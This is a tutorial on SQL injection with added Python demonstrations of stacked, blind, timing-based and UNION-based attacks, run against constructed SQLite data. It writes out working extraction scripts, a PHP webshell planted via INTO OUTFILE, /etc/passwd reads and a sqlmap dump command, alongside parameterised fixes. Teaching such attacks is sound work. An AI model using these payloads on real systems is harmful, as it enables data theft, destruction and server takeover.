The essence of an injection attack is that data supplied by the user ends up being executed as code. Two conditions must both hold: the user controls the input, and the program executes code that it builds by splicing that input into it.
1. SQL injection
A typical example of SQL injection (classic ASP, JScript):
var ShipCity;
ShipCity = Request.Form("ShipCity");
var sql = "SELECT * FROM orderstable WHERE ShipCity = '" + ShipCity + "'";
The value of the variable ShipCity is supplied by the user. If the user submits input that carries SQL of its own, such as:
Beijing';DROP TABLE orderstable--
then the statement actually executed becomes:
SELECT * FROM orderstable WHERE ShipCity = 'Beijing';DROP TABLE orderstable--'
The original query runs normally, and the DROP TABLE spliced in after it runs too. The closing quote that the application appends is swallowed by the -- comment. Whether the second statement runs depends on the database driver accepting stacked statements, as the ASP and SQL Server stack in this example does.
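As an added example, not code from the original page, the same splicing mistake and its fix in Python, with an in-memory SQLite database standing in for the orders table. The table and rows are constructed sample data, and sqlite3's executescript() stands in for a driver that accepts stacked statements, which is what the attack relies on.

```python
import sqlite3

# Payload from the text: closes the quoted string, stacks a second statement,
# and comments out the trailing quote that the application appends.
PAYLOAD = "Beijing';DROP TABLE orderstable--"


def fresh_db():
    """Constructed sample data standing in for the application's orders table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE orderstable (orderid INTEGER PRIMARY KEY, shipcity TEXT);"
        "INSERT INTO orderstable (shipcity) VALUES ('Beijing'), ('Shanghai');"
    )
    return conn


def table_exists(conn, name="orderstable"):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None


def vulnerable_lookup(conn, ship_city):
    """Builds the query by string splicing, exactly as the ASP snippet above does.

    executescript() stands in for a database driver that executes stacked
    statements; that is what lets the attacker's DROP TABLE run.
    Returns the SQL that was actually sent to the database.
    """
    sql = "SELECT * FROM orderstable WHERE shipcity = '" + ship_city + "'"
    conn.executescript(sql)
    return sql


def safe_lookup(conn, ship_city):
    """Same query with a bound parameter: the input is data and is never parsed as SQL."""
    cur = conn.execute("SELECT * FROM orderstable WHERE shipcity = ?", (ship_city,))
    return cur.fetchall()


if __name__ == "__main__":
    conn = fresh_db()
    print(vulnerable_lookup(conn, PAYLOAD))
    print("table survives splicing:", table_exists(conn))          # False
    conn = fresh_db()
    print("rows for payload via parameters:", safe_lookup(conn, PAYLOAD))  # []
    print("table survives parameters:", table_exists(conn))        # True
```

With the parameterised query the payload is just an odd city name that matches nothing; the table is untouched.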
1.1. Blind injection
Blind injection is an injection attack carried out when the server returns no error message (no error echo) to the attacker.
The most common way to verify a blind injection is to construct a simple conditional expression and judge, from whether the returned page changes, whether the injected SQL was executed.
For example, the URL of an application is:
http://newspaper.com/items.php?id=2
The SQL statement executed is:
SELECT title, description, body FROM items WHERE id = 2
If the attacker appends a condition:
http://newspaper.com/items.php?id=2 and 1=2
the SQL statement actually executed is:
SELECT title, description, body FROM items WHERE id = 2 AND 1=2
Because 1=2 is always false, the AND condition can never be satisfied, so the query returns no rows whatever the user submitted for id. To the web application this looks like a missing item: the page the attacker sees is either blank or an error page.
To confirm the injection, the attacker then sends:
http://newspaper.com/items.php?id=2 and 1=1
If this request returns the normal page, the injected AND was executed by the database, and the id parameter has an SQL injection vulnerability. Both probes matter: a true condition must leave the page unchanged and a false condition must change it; otherwise the difference may come from input validation or from the application ignoring the parameter rather than from SQL being executed.
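As an added example, not part of the original page, the items.php behaviour simulated in Python over an in-memory SQLite table (constructed data), with the two-probe check from the text implemented as a function, and the same page with the id parameter validated and bound so that the check comes out negative.

```python
import sqlite3

# Constructed stand-in for the newspaper's items table.
_conn = sqlite3.connect(":memory:")
_conn.executescript(
    "CREATE TABLE items (id INTEGER PRIMARY KEY, title TEXT, description TEXT, body TEXT);"
    "INSERT INTO items VALUES (1,'First','d1','b1'),(2,'Second','d2','b2'),(3,'Third','d3','b3');"
)


def _render(rows):
    return "\n".join(" ".join(r) for r in rows)


def items_page_vulnerable(id_param):
    """items.php as described in the text: id is spliced into the query unquoted.
    Returns the page body: '' when no row matched, 'ERROR' when the query failed."""
    sql = "SELECT title, description, body FROM items WHERE id = " + id_param
    try:
        return _render(_conn.execute(sql).fetchall())
    except sqlite3.Error:
        return "ERROR"


def items_page_fixed(id_param):
    """Hardened version: id must be an integer and is passed as a bound parameter,
    so 'and 1=1' never reaches the SQL parser."""
    try:
        item_id = int(id_param)
    except ValueError:
        return "ERROR"
    rows = _conn.execute(
        "SELECT title, description, body FROM items WHERE id = ?", (item_id,)
    ).fetchall()
    return _render(rows)


def is_boolean_blind_injectable(fetch_page, base_id):
    """The two-probe check from the text. A true condition must leave the page
    unchanged AND a false condition must change it; requiring both avoids
    flagging a page that merely rejects or ignores the parameter."""
    baseline = fetch_page(base_id)
    with_true = fetch_page(base_id + " and 1=1")
    with_false = fetch_page(base_id + " and 1=2")
    return with_true == baseline and with_false != baseline


if __name__ == "__main__":
    print("vulnerable:", is_boolean_blind_injectable(items_page_vulnerable, "2"))  # True
    print("fixed:", is_boolean_blind_injectable(items_page_fixed, "2"))            # False
```

Against the fixed page both probes produce the error page, so the true-condition leg fails and the function correctly reports no injection.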
1.2. Timing attack
MySQL has a BENCHMARK() function, intended for testing function performance, which takes two parameters: BENCHMARK(count, expr).
The function evaluates the expression expr count times. For example:
mysql> SELECT BENCHMARK(1000000, ENCODE('hello', 'goodbye'));
executes ENCODE('hello', 'goodbye') one million times.
BENCHMARK() therefore lets an attacker force the same function to be evaluated many times, so that the query takes noticeably longer than usual to return; from the change in response time the attacker can tell whether the injected statement executed. In blind injection this technique is called a timing attack.
The attacker then uses the timing attack to carry the attack through, for example by constructing the following value for the id parameter:
1170 UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(119), BENCHMARK(5000000, ENCODE('MSG','by 5 seconds')), null) FROM (SELECT DATABASE() AS current) AS tbl
Code annotations:
UNION: merges the result sets of two or more SELECT statements and removes duplicate rows. Each SELECT must return the same number of columns, the columns must have compatible data types, and they must appear in the same order; the column names of the UNION result are those of the first SELECT.
UNION ALL: like UNION, but duplicate rows are not removed.
IF(expr1, expr2, expr3): returns expr2 if expr1 is true, otherwise expr3.
DATABASE(): returns the name of the current (default) database, or NULL if the session has not selected one.
Other useful functions: SYSTEM_USER(): same as USER(), the user name and host the client connected with; CURRENT_USER(): the account the server actually used to authenticate the client; LAST_INSERT_ID(): the AUTO_INCREMENT id of the last inserted row.
This payload tests whether the first character of the database name is CHAR(119), i.e. lowercase w. If it is, BENCHMARK() makes the query stall noticeably; if not, the statement returns almost immediately. The attacker repeats this for every candidate character at every position until the entire database name has been recovered.
If the current database user (CURRENT_USER()) has write permission, in MySQL terms the FILE privilege, the attacker can write query results to the server's local disk. For example:
1170 UNION ALL SELECT table_name, table_type, engine FROM information_schema.tables WHERE table_schema = 'mysql' ORDER BY table_name DESC INTO OUTFILE '/path/shema.txt'
Writing a file can also plant a webshell, for instance via INTO OUTFILE (or INTO DUMPFILE) into a directory served by the web server:
1170 UNION SELECT "<?php system($_REQUEST['cmd']); ?>", 2, 3, 4 INTO OUTFILE "/path/c.php"--
The target directory must be writable by the MySQL server process and allowed by the secure_file_priv setting, which on recent MySQL versions restricts file operations to a single directory or disables them entirely.
The timing attack is an advanced blind injection technique. Other databases have functions comparable to BENCHMARK() that can be used for it:
MySQL: BENCHMARK(1000000, MD5(1)) or SLEEP(5)
PostgreSQL: pg_sleep(5) or generate_series(1,1000000)
MS SQL Server: WAITFOR DELAY '0:0:5'
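As an added example, not from the original page, the timing attack carried through in Python: a vulnerable endpoint over a constructed SQLite table, a delay wrapper for each of the three DBMSs listed above, an oracle that decides true or false purely from the response time, and the character-by-character walk the text describes for the database name. SLEEP() and DATABASE() are registered as Python functions so the MySQL-style payload runs unchanged on SQLite; the MySQL wrapper uses CASE WHEN rather than IF() only so it runs there too. The delay is kept short to make the demo quick.

```python
import sqlite3
import string
import time

DELAY = 0.1            # seconds the injected condition stalls when true
ALPHABET = string.ascii_lowercase + string.digits + "_"

# Constructed stand-in for the target: an SQLite table plus Python-implemented
# SLEEP() and DATABASE() so the MySQL-style payload runs unchanged.
_conn = sqlite3.connect(":memory:")
_conn.executescript(
    "CREATE TABLE items (id INTEGER PRIMARY KEY, title TEXT);"
    "INSERT INTO items VALUES (1,'First'),(2,'Second'),(3,'Third');"
)
_conn.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)
_conn.create_function("DATABASE", 0, lambda: "newspaper")   # the secret to recover


def items_page(id_param):
    """Vulnerable endpoint: id is spliced into the query. Only its timing matters here."""
    try:
        _conn.execute("SELECT title FROM items WHERE id = " + id_param).fetchall()
    except sqlite3.Error:
        pass


def delay_expression(dbms, cond, seconds):
    """Delay wrapper per DBMS. The MSSQL form is a statement, not an expression,
    and therefore needs a driver that runs stacked queries."""
    forms = {
        "mysql": "CASE WHEN ({c}) THEN SLEEP({s}) ELSE 0 END",
        "postgresql": "CASE WHEN ({c}) THEN pg_sleep({s}) ELSE pg_sleep(0) END",
        "mssql": "IF ({c}) WAITFOR DELAY '0:0:{s}'",
    }
    return forms[dbms].format(c=cond, s=seconds)


def timing_check(cond):
    """True if the injected condition held, judged purely from the response time."""
    payload = "2 AND (" + delay_expression("mysql", cond, DELAY) + ")"
    start = time.monotonic()
    items_page(payload)
    return time.monotonic() - start > DELAY / 2


def extract_by_timing(check, sql_expr, alphabet, max_len=32):
    """Recover sql_expr one character at a time, the way the text walks the
    database name: try each candidate character at each position. SUBSTR and
    CHAR are valid in both MySQL and SQLite."""
    found = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            cond = "SUBSTR(({e}),{p},1)=CHAR({n})".format(e=sql_expr, p=pos, n=ord(ch))
            if check(cond):
                found += ch
                break
        else:
            break          # no candidate matched: end of the string
    return found


if __name__ == "__main__":
    print(extract_by_timing(timing_check, "DATABASE()", ALPHABET))   # newspaper
```

A threshold of half the injected delay keeps the oracle robust against ordinary latency jitter; in a real engagement the delay is chosen well above the target's normal response-time variance, and each probe is repeated when the measurement is borderline.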
2. Database attack techniques
SQL injection is an attack carried out through the database. Different databases have different functions and different syntax, so the techniques used for SQL injection vary from one database to another.
2.1. Common attack techniques
The following payloads use UNION SELECT to confirm that the table admin exists, and then that it has a column passwd:
id=5 UNION ALL SELECT 1,2,3 FROM admin
id=5 UNION ALL SELECT 1,2,passwd FROM admin
If the table or column does not exist the database raises an error and the page changes; if it does, the UNION succeeds and the page comes back normally.
Going further, to guess the actual username and password values:
id=5 and ascii(substring((select concat(username,0x3a,passwd) from users limit 0,1),1,1)) > N /* returns true or false */
Each request tests one character: concat() joins username and passwd with 0x3a (a colon) into one string, substring() takes the character at one position, ascii() turns it into a number, and the comparison with N is answered by whether the page comes back normally. The attacker adjusts N (most efficiently by binary search) until the character is pinned down, then moves on to the next position.
Code annotations:
concat: concatenates several strings into one.
substring: extracts part of a string.
limit: restricts the number of rows the SELECT returns; the first argument is the offset of the first row returned, the second the maximum number of rows.
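As an added example, not from the page, the guessing loop above carried through in Python: a vulnerable endpoint over a constructed SQLite users table, a boolean oracle built from the "page normal or not" signal, and a binary search over the ascii() value so that each character costs seven requests instead of up to 128. ASCII() and CONCAT() are registered as Python functions so the MySQL-style payload from the text runs on SQLite; the separator is CHAR(58) rather than 0x3a because SQLite reads 0x3a as an integer.

```python
import sqlite3

# Constructed stand-in for the target's database. ASCII() and CONCAT() are
# registered in Python so the MySQL-style payload from the text runs on SQLite.
_conn = sqlite3.connect(":memory:")
_conn.executescript(
    "CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);"
    "INSERT INTO news VALUES (5,'Hello');"
    "CREATE TABLE users (username TEXT, passwd TEXT);"
    "INSERT INTO users VALUES ('admin','s3cret!');"
)
_conn.create_function("ASCII", 1, lambda s: ord(s[0]) if s else 0)
_conn.create_function("CONCAT", -1, lambda *parts: "".join(str(p) for p in parts))


def page(id_param):
    """Vulnerable endpoint: returns the title when the spliced query finds a row, else ''."""
    try:
        rows = _conn.execute("SELECT title FROM news WHERE id = " + id_param).fetchall()
    except sqlite3.Error:
        return ""
    return rows[0][0] if rows else ""


def oracle(cond):
    """Boolean oracle: the page is normal exactly when the injected condition is true."""
    return page("5 and " + cond) == page("5")


# The scalar subquery from the text, with CHAR(58) as the ':' separator.
SECRET_EXPR = "(select concat(username,char(58),passwd) from users limit 0,1)"


def char_at(pos):
    """Pins down the character at `pos` with ascii(substr(...)) > N probes,
    halving the 0..127 range each time (7 requests per character)."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle("ascii(substr(%s,%d,1)) > %d" % (SECRET_EXPR, pos, mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo              # 0 means substr() returned '': past the end of the string


def extract(max_len=64):
    """Walks the positions until the oracle reports an empty character."""
    out = ""
    for pos in range(1, max_len + 1):
        code = char_at(pos)
        if code == 0:
            break
        out += chr(code)
    return out


if __name__ == "__main__":
    print(extract())   # admin:s3cret!
```

The same loop works against any scalar expression the attacker can place in the subquery; only the condition string changes. This is what tools automate, and why the tedium of doing it by hand is not a defence.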
This process is tedious; sqlmap (http://sqlmap.sourceforge.net) is a very good automated injection tool:
$ python sqlmap.py -u "http://a.com/test.php?id=1" --dump -T users
During injection there are often techniques for reading and writing files. In MySQL, for example, LOAD_FILE() reads files from the server's filesystem and INTO DUMPFILE writes local files; both require the FILE privilege and, on recent versions, a path allowed by secure_file_priv. Restricting the database user's permission to read and write the relevant files or directories is therefore also a defensive measure.
UNION SELECT LOAD_FILE('/etc/passwd'),1,1;
CREATE TABLE potatoes (line BLOB);
UNION SELECT 1,1,HEX(LOAD_FILE('/etc/passwd')) INTO DUMPFILE '/path/potatoes';
LOAD DATA INFILE '/path/potatoes' INTO TABLE potatoes;
Besides INTO DUMPFILE there is INTO OUTFILE. The difference is that DUMPFILE writes a single row raw, with no escaping, column separators or line terminators, and so suits binary files, whereas OUTFILE writes rows with field and line terminators and is better suited to text files.
2.2. Command
Web Security Injection attack